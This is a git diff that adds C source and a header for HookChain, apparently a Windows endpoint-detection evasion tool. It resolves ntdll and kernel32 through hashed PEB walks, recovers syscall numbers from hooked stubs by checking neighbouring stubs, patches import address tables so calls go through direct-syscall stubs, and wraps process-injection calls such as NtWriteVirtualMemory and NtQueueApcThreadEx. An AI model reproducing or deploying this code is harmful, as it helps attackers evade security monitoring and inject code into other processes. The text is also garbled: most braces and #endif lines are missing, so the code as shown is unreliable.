+ va = (PVOID)((PBYTE)imageBase + pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
+ memcpy(lpLocalAddress, va, pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size);
+ pImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(lpLocalAddress);
+ LPCSTR libraryName = NULL;
+ HMODULE library = NULL;
+ PSYSCALL_INFO Entries = SyscallList.Entries;
+ DWORD minRVA = 0xffffffff;
+ DWORD maxRVA = 0;
+ while (tmp1->Name != NULL)
+ {
+ if (tmp1->Name > maxRVA)
+ maxRVA = tmp1->Name;
+ if (tmp1->Name < minRVA)
+ minRVA = tmp1->Name;
+ tmp1++;
+ }
+ maxRVA += 100; // Space for the last name
+ PVOID lpNames = RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, maxRVA - minRVA);
+ if (!lpNames)
+ {
+#ifdef DEBUG
+ printf("[!] Error getting data space for lpNames: Status = 0x%08lx\n", GetLastError());
+ return FALSE;
+ }
+ PVOID vaNames = (PVOID)((PBYTE)imageBase + minRVA);
+ memcpy(lpNames, vaNames, maxRVA - minRVA);
+ // Allocate 8 Mb
+ //PVOID lpThunk = VirtualAllocEx((HANDLE)-1, NULL, 1 << 23, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ PVOID lpThunk = RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, 1 << 23);
+ if (!lpThunk)
+ {
+#ifdef DEBUG
+ printf("[!] Error getting data space for lpThunk: Status = 0x%08lx\n", GetLastError());
+ return FALSE;
+ }
+ while (pImportDescriptor->Name != NULL)
+ {
+ libraryName = RVA2OFFSET(LPCSTR, imageBase, lpNames, vaNames, (LPCSTR)pImportDescriptor->Name);
+ library = HGetModuleHandleA(libraryName, TRUE);
+ if (library == NULL) {
+#ifdef DEBUG
+ printf("[!] Error getting lib: Status = 0x%08lx\n", GetLastError());
+ }
+ if (library)
+ {
+ minRVA = 0xffffffff;
+ maxRVA = 0;
+ PIMAGE_THUNK_DATA tmp2 = (PIMAGE_THUNK_DATA)((DWORD_PTR)imageBase + pImportDescriptor->OriginalFirstThunk);
+ PIMAGE_THUNK_DATA tmp3 = (PIMAGE_THUNK_DATA)((DWORD_PTR)imageBase + pImportDescriptor->FirstThunk);
+ while (tmp2->u1.AddressOfData != NULL)
+ {
+ if (tmp2->u1.AddressOfData > maxRVA)
+ maxRVA = tmp2->u1.AddressOfData;
+ if (tmp2->u1.AddressOfData < minRVA)
+ minRVA = tmp2->u1.AddressOfData;
+ DWORD c1 = (DWORD_PTR)tmp2 - (DWORD_PTR)imageBase;
+ if (c1 > maxRVA)
+ maxRVA = c1;
+ if (c1 < minRVA)
+ minRVA = c1;
+ c1 = (DWORD_PTR)tmp3 - (DWORD_PTR)imageBase;
+ if (c1 > maxRVA)
+ maxRVA = c1;
+ if (c1 < minRVA)
+ minRVA = c1;
+ ++tmp2;
+ ++tmp3;
+ }
+ maxRVA += 100; // Space for the last name
+ if ((maxRVA - minRVA) <= (1 << 23))
+ {
+ PVOID vaFuncs = (PVOID)((PBYTE)imageBase + minRVA);
+ memcpy(lpThunk, vaFuncs, maxRVA - minRVA);
+ PIMAGE_THUNK_DATA originalFirstThunk = NULL, firstThunk = NULL;
+ originalFirstThunk = RVA2OFFSET(PIMAGE_THUNK_DATA, imageBase, lpThunk, vaFuncs, pImportDescriptor->OriginalFirstThunk);
+ firstThunk = RVA2OFFSET(PIMAGE_THUNK_DATA, imageBase, lpThunk, vaFuncs, pImportDescriptor->FirstThunk);
+ while ((originalFirstThunk->u1.AddressOfData != NULL) && ((originalFirstThunk->u1.AddressOfData & 0xffffffffffff) >= 0x1000))
+ {
+ functionName = RVA2OFFSET(PIMAGE_IMPORT_BY_NAME, imageBase, lpThunk, vaFuncs, originalFirstThunk->u1.AddressOfData);
+ PBYTE pcName = ((PBYTE)&functionName->Name);
+ PVOID fncAddr = NULL;
+ DWORD ssn = -1;
+ if ((DWORD64)library == (DWORD64)ntdllBase)
+ {
+ DWORD64 dwHash = djb2(((PBYTE)pcName) + 2);
+ //printf("\n%s 0x%p, 0x%016llx\n", functionName->Name, firstThunk->u1.Function, dwHash);
+ for (DWORD i = 0; i < SyscallList.Count; i++)
+ {
+ //printf("%s 0x%p, 0x%p, 0x%p\n", functionName->Name, firstThunk->u1.Function, (DWORD64)Entries[i].pAddress, (DWORD64)firstThunk->u1.Function);
+ if ((DWORD64)Entries[i].pAddress == (DWORD64)firstThunk->u1.Function)
+ {
+ if (Entries[i].bIsHooked) {
+ fncAddr = Entries[i].pStubFunction;
+ ssn = Entries[i].dwSsn;
+ //printf("%s 0x%p 0x%016llx 0x%016llx\n", functionName->Name, fncAddr, dwHash, Entries[i].dwHash);
+ }
+ break;
+ }
+ else if (dwHash == Entries[i].dwHash)
+ {
+ //printf("%s 0x%p, 0x%p, 0x%p 0x%016llx\n", functionName->Name, firstThunk->u1.Function, (DWORD64)Entries[i].pAddress, fncAddr, dwHash);
+ fncAddr = Entries[i].pStubFunction;
+ ssn = Entries[i].dwSsn;
+ break;
+ }
+ }
+ }
+ if ((fncAddr == NULL) && ((DWORD64)library != (DWORD64)ntdllBase))
+ {
+ DWORD64 dwHash = djb2(((PBYTE)pcName));
+ for (DWORD i = 0; i < HookList.Count; i++)
+ {
+ if (dwHash == HookList.Entries[i].dwHash)
+ {
+ fncAddr = HookList.Entries[i].pStubFunction;
+ break;
+ }
+ }
+ }
+ if (fncAddr != NULL)
+ {
+ //printf("%s 0x%p\n", functionName->Name, fncAddr);
+ SIZE_T bytesWritten = 0;
+ DWORD oldProtect = 0;
+ PVOID lpAddress;
+ PVOID fncAddress;
+ SIZE_T sDataSize = 8;
+ PIMAGE_THUNK_DATA pRealThunk = (PIMAGE_THUNK_DATA)((DWORD_PTR)imageBase + OFFSET2RVA(imageBase, lpThunk, vaFuncs, firstThunk));
+ lpAddress = fncAddress = (LPVOID)(&pRealThunk->u1.Function);
+ HANDLE hProc = (HANDLE)-1;
+ if (hProcess != (HANDLE)-1)
+ hProc = hProcess;
+ if (NtProtectVirtualMemory(hProc, &lpAddress, &sDataSize, PAGE_READWRITE, &oldProtect) == 0)
+ {
+ pRealThunk->u1.Function = (DWORD_PTR)fncAddr;
+ hCount++;
+#ifdef DEBUG
+ if (ssn != -1)
+ printf(" |--> Implant %s %s->%s 0x%p SSN 0x%02X\n", imageName, libraryName, functionName->Name, pRealThunk->u1.Function, ssn);
+ else
+ printf(" |--> Implant %s %s->%s 0x%p\n", imageName, libraryName, functionName->Name, pRealThunk->u1.Function);
+ }
+ }
+ ++originalFirstThunk;
+ ++firstThunk;
+ }
+ }
+ }
+ pImportDescriptor++;
+ }
+#ifdef DEBUG
+ printf(" +--> Hooked %d function(s)\n", hCount);
+BOOL UnhookAll(_In_ HANDLE hProcess, _In_ LPCSTR imageName, _In_ BOOLEAN force)
+ LPVOID imageBase = HGetModuleHandleA(imageName, force);
+ if ((force && (imageBase == NULL)) || ((imageBase == NULL) && (hProcess != (HANDLE)-1)))
+ imageBase = HGetModuleHandleA(imageName, TRUE);
+#ifdef DEBUG
+ printf("\n[>] IAT Hook of: %s => 0x%p\n", imageName, imageBase);
+ if (imageBase == NULL)
+ {
+#ifdef DEBUG
+ DWORD le = GetLastError();
+ if (le == 126) {
+ printf("[-] UnhookAll(%s): %s\n", imageName, "Module handle not found!");
+ }
+ else {
+ printf("[-] UnhookAll(%s): %u\n", imageName, GetLastError());
+ }
+ return FALSE;
+ }
+ return ProcAllByAddr(imageName, imageBase, hProcess);
+ //return ExecAddr2(imageName, imageBase, hProcess);
+FARPROC HGetModuleHandleA(LPCSTR imageName, _In_ BOOLEAN forceLoad)
+ DWORD64 dwHash = djb2(((PBYTE)imageName) + 2);
+ PMODULE_INFO Entries = ModList.Entries;
+ for (DWORD i = 0; i < ModList.Count; i++)
+ {
+ if (dwHash == Entries[i].dwHash)
+ return (FARPROC)Entries[i].pAddress;
+ }
+ LPVOID imageBase = GetModuleHandleA(imageName);
+ if (forceLoad && (imageBase == NULL))
+ imageBase = LoadLibraryA(imageName);
+ if (imageBase == NULL)
+ return NULL;
+ Entries[ModList.Count].pAddress = imageBase;
+ Entries[ModList.Count].dwHash = dwHash;
+ ModList.Count++;
+ return imageBase;
+FARPROC HGetProcAddress2(LPCSTR imageName, LPCSTR procName)
+ LPVOID imageBase = HGetModuleHandleA(imageName, TRUE);
+ return HGetProcAddress(imageBase, procName, 0);
+FARPROC HGetProcAddress3(FARPROC imageBase, LPCSTR procName)
+ //FARPROC addr = HGetProcAddress(imageBase, procName, 0x00);
+ //printf("GetProcAddress 0x%p %s -> 0x%p\n", imageBase, procName, addr);
+ //return addr;
+ return HGetProcAddress(imageBase, procName, 0x00);
+FARPROC HGetProcAddress(FARPROC imageBase, LPCSTR procName, _In_opt_ DWORD64 procHash)
+ PPEB pCurrentPeb;
+ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory;
+ PIMAGE_DOS_HEADER pImageDosHeader;
+ PIMAGE_NT_HEADERS pImageNtHeaders;
+ PVOID va;
+ pImageDosHeader = (PIMAGE_DOS_HEADER)imageBase;
+ if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
+ return NULL;
+ pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)imageBase + pImageDosHeader->e_lfanew);
+ if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
+ return NULL;
+ //Check if is a hooked/mapped function
+ if ((SyscallList.Count > 0) && ((DWORD64)ntdllBase == (DWORD64)imageBase)) {
+ PSYSCALL_INFO Entries = SyscallList.Entries;
+ DWORD64 dwHash = 0;
+ if (procName != NULL) dwHash = djb2(((PBYTE)procName) + 2);
+ for (DWORD i = 0; i < SyscallList.Count; i++)
+ {
+ if ((procHash > 0) && (procHash == Entries[i].dwHash))
+ return Entries[i].pStubFunction;
+ if ((procName != NULL) && (dwHash == Entries[i].dwHash))
+ return Entries[i].pStubFunction;
+ }
+ }
+ //Check if is a hooked/mapped function
+ if ((HookList.Count > 0) && (procName != NULL)) {
+ PSYSCALL_INFO Entries = HookList.Entries;
+ DWORD64 dwHash = djb2(((PBYTE)procName));
+ for (DWORD i = 0; i < HookList.Count; i++)
+ {
+ if (dwHash == Entries[i].dwHash)
+ return Entries[i].pStubFunction;
+ }
+ }
+ // Create a copy of the first 4096 bytes
+ PVOID lpLocalAddress = RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, pImageNtHeaders->OptionalHeader.DataDirectory[0].Size);
+ if (!lpLocalAddress)
+ return NULL;
+ va = (PVOID)((PBYTE)imageBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
+ memcpy(lpLocalAddress, va, pImageNtHeaders->OptionalHeader.DataDirectory[0].Size);
+ pImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(lpLocalAddress);
+ PDWORD pdwFunctions = RVA2OFFSET(PDWORD, imageBase, lpLocalAddress, va, pImageExportDirectory->AddressOfFunctions);
+ PDWORD pdwNames = RVA2OFFSET(PDWORD, imageBase, lpLocalAddress, va, pImageExportDirectory->AddressOfNames);
+ PWORD pwNameOrdinals = RVA2OFFSET(PDWORD, imageBase, lpLocalAddress, va, pImageExportDirectory->AddressOfNameOrdinals);
+ LPCSTR pcName = NULL;
+ PVOID pAddress = NULL;
+ for (WORD i = 0; i < pImageExportDirectory->NumberOfNames; i++) {
+ pcName = RVA2OFFSET(LPCSTR, imageBase, lpLocalAddress, va, pdwNames[i]);
+ pAddress = (PBYTE)imageBase + pdwFunctions[pwNameOrdinals[i]];
+ if (procHash > 0) {
+ DWORD64 dwHash = djb2(((PBYTE)pcName) + 2);
+ if (dwHash == procHash)
+ return (PVOID)pAddress;
+ }
+ if ((procName != NULL) && (lstrcmpiA(pcName, procName) == 0))
+ return (PVOID)pAddress;
+ }
+ return NULL;
+static PVOID GetNextSyscallInstruction(_In_ PVOID pStartAddr)
+ for (DWORD i = 0, j = 1; i <= 512; i++, j++) {
+ if (*((PBYTE)pStartAddr + i) == 0x0f && *((PBYTE)pStartAddr + j) == 0x05) {
+ return (PVOID)((ULONG_PTR)pStartAddr + i);
+ }
+ }
+ return NULL;
+static DWORD64 GetSSN(_In_ PVOID pAddress)
+ BYTE low, high;
+ /*
+ Handle non-hooked functions
+ mov r10, rcx
+ mov rax,
+ */
+ if (*((PBYTE)pAddress + 0) == 0x4c && *((PBYTE)pAddress + 1) == 0x8b && *((PBYTE)pAddress + 2) == 0xd1 &&
+ *((PBYTE)pAddress + 3) == 0xb8 && *((PBYTE)pAddress + 6) == 0x00 && *((PBYTE)pAddress + 7) == 0x00) {
+ high = *((PBYTE)pAddress + 5);
+ low = *((PBYTE)pAddress + 4);
+ return (high << 8) | low;
+ }
+ // Derive SSN from neighbour syscalls
+ for (WORD idx = 1; idx <= MAX_NEIGHBOURS; idx++) {
+ if (*((PBYTE)pAddress + 0 + idx * NEXT) == 0x4c && *((PBYTE)pAddress + 1 + idx * NEXT) == 0x8b &&
+ *((PBYTE)pAddress + 2 + idx * NEXT) == 0xd1 && *((PBYTE)pAddress + 3 + idx * NEXT) == 0xb8 &&
+ *((PBYTE)pAddress + 6 + idx * NEXT) == 0x00 && *((PBYTE)pAddress + 7 + idx * NEXT) == 0x00) {
+ high = *((PBYTE)pAddress + 5 + idx * NEXT);
+ low = *((PBYTE)pAddress + 4 + idx * NEXT);
+ return (high << 8) | low - idx;
+ }
+ if (*((PBYTE)pAddress + 0 + idx * PREV) == 0x4c && *((PBYTE)pAddress + 1 + idx * PREV) == 0x8b &&
+ *((PBYTE)pAddress + 2 + idx * PREV) == 0xd1 && *((PBYTE)pAddress + 3 + idx * PREV) == 0xb8 &&
+ *((PBYTE)pAddress + 6 + idx * PREV) == 0x00 && *((PBYTE)pAddress + 7 + idx * PREV) == 0x00) {
+ high = *((PBYTE)pAddress + 5 + idx * PREV);
+ low = *((PBYTE)pAddress + 4 + idx * PREV);
+ return (high << 8) | low + idx;
+ }
+ }
+ return -1;
+NTSTATUS NtAllocateVirtualMemory(_In_ HANDLE ProcessHandle, _Inout_ PVOID* BaseAddress, _In_ ULONG_PTR ZeroBits, _Inout_ PSIZE_T RegionSize, _In_ ULONG AllocationType, _In_ ULONG Protect)
+ return NtAllocateVirtualMemoryStub(ProcessHandle, BaseAddress, ZeroBits, RegionSize, AllocationType, Protect);
+NTSTATUS NtWriteVirtualMemory(_In_ HANDLE ProcessHandle, _In_ PVOID BaseAddress, _In_ PVOID Buffer, _In_ ULONG NumberOfBytesToWrite, _Out_opt_ PULONG NumberOfBytesWritten)
+ return NtWriteVirtualMemoryStub(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToWrite, NumberOfBytesWritten);
+NTSTATUS NtOpenProcess(_Out_ PHANDLE ProcessHandle, _In_ ACCESS_MASK AccessMask, _In_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ PCLIENT_ID ClientId)
+ return NtOpenProcessStub(ProcessHandle, AccessMask, ObjectAttributes, ClientId);
+NTSTATUS NtProtectVirtualMemory(_In_ HANDLE ProcessHandle, _Inout_ PVOID* BaseAddress, _Inout_ PULONG NumberOfBytesToProtect, _In_ ULONG NewAccessProtection, _Out_ PULONG OldAccessProtection)
+ return NtProtectVirtualMemoryStub(ProcessHandle, BaseAddress, NumberOfBytesToProtect, NewAccessProtection, OldAccessProtection);
+NTSTATUS NtReadVirtualMemory(_In_ HANDLE ProcessHandle, _In_ PVOID BaseAddress, _Out_ PVOID Buffer, _In_ ULONG NumberOfBytesToRead, _Out_opt_ PULONG NumberOfBytesReaded)
+ return NtReadVirtualMemoryStub(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToRead, NumberOfBytesReaded);
+NTSTATUS NtQueryVirtualMemory(_In_ HANDLE ProcessHandle, _In_ PVOID BaseAddress, _In_ MEMORY_INFORMATION_CLASS MemoryInformationClass, _Out_ PVOID Buffer, _In_ ULONG Length, _Out_opt_ PULONG ResultLength)
+ return NtQueryVirtualMemoryStub(ProcessHandle, BaseAddress, MemoryInformationClass, Buffer, Length, ResultLength);
+BOOL HReadProcessMemory(_In_ HANDLE ProcessHandle, _In_ PVOID BaseAddress, _Out_ PVOID Buffer, _In_ ULONG NumberOfBytesToRead, _Out_opt_ PULONG NumberOfBytesReaded)
+ return (NtReadVirtualMemoryStub(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToRead, NumberOfBytesReaded) == 0);
+BOOL HVirtualProtect(_Inout_ PVOID* BaseAddress, _Inout_ PULONG NumberOfBytesToProtect, _In_ ULONG NewAccessProtection, _Out_ PULONG OldAccessProtection)
+ return (NtProtectVirtualMemoryStub((HANDLE)-1, BaseAddress, NumberOfBytesToProtect, NewAccessProtection, OldAccessProtection) == 0);
+BOOL HVirtualProtectEx(_In_ HANDLE ProcessHandle, _Inout_ PVOID* BaseAddress, _Inout_ PULONG NumberOfBytesToProtect, _In_ ULONG NewAccessProtection, _Out_ PULONG OldAccessProtection)
+ return (NtProtectVirtualMemoryStub(ProcessHandle, BaseAddress, NumberOfBytesToProtect, NewAccessProtection, OldAccessProtection) == 0);
+SIZE_T HVirtualQuery(_In_ PVOID* lpAddress, _Out_ PVOID lpBuffer, _In_ ULONG dwLength)
+ return HVirtualQueryEx((HANDLE)-1, lpAddress, lpBuffer, dwLength);
+SIZE_T HVirtualQueryEx(_In_ HANDLE hProcess, _In_ PVOID* lpAddress, _Out_ PVOID lpBuffer, _In_ ULONG dwLength)
+ SIZE_T ResultLength = 0;
+ NtQueryVirtualMemoryStub(hProcess, lpAddress, MemoryBasicInformation, lpBuffer, dwLength, &ResultLength);
+ printf("VirtualQuery %d %d\n", dwLength, ResultLength);
+ return ResultLength;
+PVOID RtlAllocateHeapStub(_In_ PVOID HeapHandle, _In_ ULONG Flags, _In_ SIZE_T Size) {
+ if (pRtlAllocateHeap == NULL) {
+ PVOID addr = malloc(Size);
+ memset(addr, 0x00, Size);
+ return addr;
+ }
+ PVOID(*AH)(void) = pRtlAllocateHeap;
+ return AH(HeapHandle, Flags, Size);
+DWORD64 djb2(PBYTE str)
+ DWORD64 dwHash = 0x7734773477347734;
+ INT c;
+ while (c = (INT)((char)*str++))
+ dwHash = ((dwHash << 0x5) + dwHash) + c;
+ return dwHash;
+BOOL GetBaseAddresses(VOID)
+ if (ntdllBase && kernel32Base && kernelbaseBase)
+ return TRUE;
+ // the kernels base address and later this images newly loaded base address
+ ULONG_PTR uiBaseAddress;
+ PPEB pCurrentPeb;
+ PLIST_ENTRY pHeadEntry = NULL;
+ // get the Process Enviroment Block
+ pCurrentPeb = NtCurrentPeb();
+ if (!pCurrentPeb || pCurrentPeb->OSMajorVersion != 0x0a)
+ return NULL;
+ // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
+ uiBaseAddress = (ULONG_PTR)pCurrentPeb->LoaderData;
+ DWORD64 idx = ModList.Count;
+ if (idx == 0) {
+ idx = 1;
+ ModList.Count = 1;
+ }
+ pHeadEntry = &pCurrentPeb->LoaderData->InMemoryOrderModuleList;
+ pEntry = pHeadEntry->Flink;
+ while (pEntry != pHeadEntry)
+ {
+ pLdrDataEntry = CONTAINING_RECORD(pEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
+ PWCHAR pcName = pLdrDataEntry->BaseDllName.Buffer;
+ DWORD64 dwHash = djb2((PBYTE)pLdrDataEntry->BaseDllName.Buffer);
+ // compare the hash with that of kernel32.dll -> 0x5DC35DC35DC35DFF
+ if (dwHash == 0x5DC35DC35DC35DFF)
+ {
+ kernel32Base = (FARPROC)pLdrDataEntry->DllBase;
+ }
+ // compare the hash with that of ntdll.dll -> 0x5DC35DC35DC35E22
+ else if (dwHash == 0x5DC35DC35DC35E22)
+ {
+ ntdllBase = (FARPROC)pLdrDataEntry->DllBase;
+ //ntdll always should be the first
+ ModList.Entries[0].pAddress = (PVOID)pLdrDataEntry->DllBase;
+ ModList.Entries[0].dwHash = dwHash;
+ }
+ for (DWORD i = 0; i < ModList.Count; i++)
+ {
+ if (((DWORD64)ModList.Entries[i].pAddress == (DWORD64)pLdrDataEntry->DllBase) || (dwHash == ModList.Entries[i].dwHash))
+ {
+ f = TRUE;
+ break;
+ }
+ }
+ if (!f) {
+ ModList.Entries[ModList.Count].pAddress = (PVOID)pLdrDataEntry->DllBase;
+ ModList.Entries[ModList.Count].dwHash = dwHash;
+ ModList.Count++;
+ }
+ // we stop searching when we have found everything we need.
+ if (ntdllBase && kernel32Base)
+ break;
+ // get the next entry
+ pEntry = pEntry->Flink;
+ }
+ if (!ntdllBase) {
+ ntdllBase = GetClearNtdll();
+ ModList.Entries[0].pAddress = ntdllBase;
+ ModList.Entries[0].dwHash = 0x5DC35DC35DC35E22;
+ }
+ if (!kernelbaseBase)
+ kernelbaseBase = LoadLibraryA("kernelbase");
+ if (ntdllBase && kernel32Base && kernelbaseBase)
+ return TRUE;
+ return FALSE;
+//Look for a clear version of NTDLL
+PVOID GetClearNtdll(VOID)
+ // the kernels base address and later this images newly loaded base address
+ ULONG_PTR uiBaseAddress;
+ PPEB pCurrentPeb;
+ PLIST_ENTRY pHeadEntry = NULL;
+ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory;
+ PIMAGE_DOS_HEADER pImageDosHeader;
+ PIMAGE_NT_HEADERS pImageNtHeaders;
+ PVOID pBase;
+ PDWORD pdwFunctions;
+ PDWORD pdwNames;
+ PWORD pwNameOrdinals;
+ LPCSTR pcName = NULL;
+ PVOID pAddress = NULL;
+ // get the Process Enviroment Block
+ pCurrentPeb = NtCurrentPeb();
+ if (!pCurrentPeb || pCurrentPeb->OSMajorVersion != 0x0a)
+ return NULL;
+ // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
+ uiBaseAddress = (ULONG_PTR)pCurrentPeb->LoaderData;
+ pHeadEntry = &pCurrentPeb->LoaderData->InMemoryOrderModuleList;
+ pEntry = pHeadEntry->Flink;
+ while (pEntry != pHeadEntry)
+ {
+ pLdrDataEntry = CONTAINING_RECORD(pEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
+ PWCHAR pcName = pLdrDataEntry->BaseDllName.Buffer;
+ //DWORD64 dwHash = djb2((PBYTE)pLdrDataEntry->BaseDllName.Buffer);
+ pBase = pLdrDataEntry->DllBase;
+ pImageDosHeader = (PIMAGE_DOS_HEADER)pBase;
+ if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
+ goto nextmod;
+ pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pBase + pImageDosHeader->e_lfanew);
+ if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
+ goto nextmod;
+ if (pImageNtHeaders->OptionalHeader.DataDirectory[0].Size == 0)
+ goto nextmod;
+ pImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
+ pdwFunctions = (PDWORD)((PBYTE)pBase + pImageExportDirectory->AddressOfFunctions);
+ pdwNames = (PDWORD)((PBYTE)pBase + pImageExportDirectory->AddressOfNames);
+ pwNameOrdinals = (PWORD)((PBYTE)pBase + pImageExportDirectory->AddressOfNameOrdinals);
+ int cnt = 0;
+ for (WORD i = 0; i < pImageExportDirectory->NumberOfNames; i++) {
+ pcName = (PCHAR)((PBYTE)pBase + pdwNames[i]);
+ // Is this a system call?
+ if ((*(USHORT*)pcName != 'tN'))
+ continue;
+ cnt++;
+ }
+ if (cnt > 200)
+ return pBase;
+ nextmod:
+ // get the next entry
+ pEntry = pEntry->Flink;
+ }
+ return NULL;
diff --git a/HookChain/HookChain/hook.h b/HookChain/HookChain/hook.h
new file mode 100644
index 0000000..9509e61
--- /dev/null
+++ b/HookChain/HookChain/hook.h
@@ -0,0 +1,115 @@
+#ifndef _OKCHAIN_OK_H
+#define _OKCHAIN_OK_H
+#include "windows_common.h"
+#define DEBUG
+//#undef DEBUG
+#define MAX_ENTRIES 512
+#define PREV -32
+#define NEXT 32
+#define MAX_NEIGHBOURS 500
+typedef struct _SYSCALL_INFO {
+ DWORD64 dwSsn;
+ PVOID pAddress;
+ PVOID pSyscallRet;
+ PVOID pStubFunction;
+ DWORD64 dwHash;
+ BOOL bIsHooked;
+typedef struct _SYSCALL_LIST
+ DWORD64 Count;
+typedef struct _FUNCTION_CODE {
+ BYTE Buffer[40];
+typedef struct _MODULE_INFO {
+ PVOID pAddress;
+ DWORD64 dwHash;
+typedef struct _MODULE_LIST
+ DWORD64 Count;
+typedef struct _FUNCTION_NAME {
+ BYTE Buffer[255];
+typedef struct _NAME_LIST
+ DWORD64 Count;
+ FUNCTION_NAME Entries[50];
+static PVOID GetNextSyscallInstruction(_In_ PVOID pStartAddr);
+static DWORD64 GetSSN(_In_ PVOID pAddress);
+FARPROC HGetModuleHandleA(LPCSTR imageName, _In_ BOOLEAN forceLoad);
+FARPROC HGetProcAddress(LPCSTR imageName, LPCSTR procName);
+FARPROC HGetProcAddress3(FARPROC imageBase, LPCSTR procName);
+BOOL UnhookAll(_In_ HANDLE hProcess, _In_ LPCSTR imageName, _In_ BOOLEAN force);
+BOOL ProcAllByAddr(_In_ LPCSTR imageBaseName, _In_ PVOID imageBase, _In_opt_ HANDLE hProcess);
+PVOID GetClearNtdll(VOID);
+BOOL GetBaseAddresses(VOID);
+BOOL InitApi(VOID);
+DWORD64 djb2(PBYTE str);
+typedef VOID(*PPS_APC_ROUTINE)(PVOID SystemArgument1, PVOID SystemArgument2, PVOID SystemArgument3, PCONTEXT ContextRecord);
+NTSTATUS NtAllocateReserveObject(_Out_ PHANDLE MemoryReserveHandle, _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ MEMORY_RESERVE_OBJECT_TYPE ObjectType);
+NTSTATUS NtAllocateVirtualMemory(_In_ HANDLE ProcessHandle, _Inout_ PVOID* BaseAddress, _In_ ULONG_PTR ZeroBits, _Inout_ PSIZE_T RegionSize, _In_ ULONG AllocationType, _In_ ULONG Protect);
+NTSTATUS NtCreateProcessEx(_Out_ PHANDLE ProcessHandle, _In_ ACCESS_MASK DesiredAccess, _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ HANDLE ParentProcess, _In_ ULONG Flags, _In_opt_ HANDLE SectionHandle, _In_opt_ HANDLE DebugPort, _In_opt_ HANDLE ExceptionPort, _In_ BOOLEAN InJob);
+NTSTATUS NtCreateThreadEx(_Out_ PHANDLE ThreadHandle, _In_ ACCESS_MASK DesiredAccess, _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ HANDLE ProcessHandle, _In_ PVOID StartRoutine, _In_opt_ PVOID Argument, _In_ ULONG CreateFlags, _In_opt_ ULONG_PTR ZeroBits, _In_opt_ SIZE_T StackSize, _In_opt_ SIZE_T MaximumStackSize, _In_opt_ PVOID AttributeList);
+NTSTATUS NtOpenProcess(_Out_ PHANDLE ProcessHandle, _In_ ACCESS_MASK AccessMask, _In_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ PCLIENT_ID ClientId);
+NTSTATUS NtQueryInformationProcess(_In_ HANDLE ProcessHandle, _In_ PROCESS_INFORMATION_CLASS ProcessInformationClass, _Out_ PVOID ProcessInformation, _In_ ULONG ProcessInformationLength, _Out_ PULONG ReturnLength);
+NTSTATUS NtQueueApcThreadEx(_In_ HANDLE ThreadHandle, _In_ HANDLE UserApcReserveHandle, _In_ PPS_APC_ROUTINE ApcRoutine, _In_opt_ PVOID SystemArgument1, _In_opt_ PVOID SystemArgument2, _In_opt_ PVOID SystemArgument3);
+NTSTATUS NtProtectVirtualMemory(_In_ HANDLE ProcessHandle, _Inout_ PVOID* BaseAddress, _Inout_ PULONG NumberOfBytesToProtect, _In_ ULONG NewAccessProtection, _Out_ PULONG OldAccessProtection);
+NTSTATUS NtReadVirtualMemory(_In_ HANDLE ProcessHandle, _In_ PVOID BaseAddress, _Out_ PVOID Buffer, _In_ ULONG NumberOfBytesToRead, _Out_opt_ PULONG NumberOfBytesReaded);
+NTSTATUS NtResumeThread(_In_ HANDLE ThreadHandle, _Out_opt_ PULONG SuspendCount);
+NTSTATUS NtWaitForSingleObject(_In_ HANDLE ObjectHandle, _In_ BOOLEAN Alertable OPTIONAL, _In_ PLARGE_INTEGER TimeOut);
+NTSTATUS NtWriteVirtualMemory(_In_ HANDLE ProcessHandle, _In_ PVOID BaseAddress, _In_ PVOID Buffer, _In_ ULONG NumberOfBytesToWrite, _Out_opt_ PULONG NumberOfBytesWritten);
+BOOL HReadProcessMemory(_In_ HANDLE ProcessHandle, _In_ PVOID BaseAddress, _Out_ PVOID Buffer, _In_ ULONG NumberOfBytesToRead, _Out_opt_ PULONG NumberOfBytesReaded);
+BOOL HVirtualProtect(_Inout_ PVOID* BaseAddress, _Inout_ PULONG NumberOfBytesToProtect, _In_ ULONG NewAccessProtection, _Out_ PULONG OldAccessProtection);
+BOOL HVirtualProtectEx(_In_ HANDLE ProcessHandle, _Inout_ PVOID* BaseAddress, _Inout_ PULONG NumberOfBytesToProtect, _In_ ULONG NewAccessProtection, _Out_ PULONG OldAccessProtection);
+SIZE_T HVirtualQuery(_In_ PVOID lpAddress, _Out_ PVOID lpBuffer, _In_ ULONG dwLength);
+SIZE_T HVirtualQueryEx(_In_ HANDLE hProcess, _In_ PVOID lpAddress, _Out_ PVOID lpBuffer, _In_ ULONG dwLength);
+// Local defs
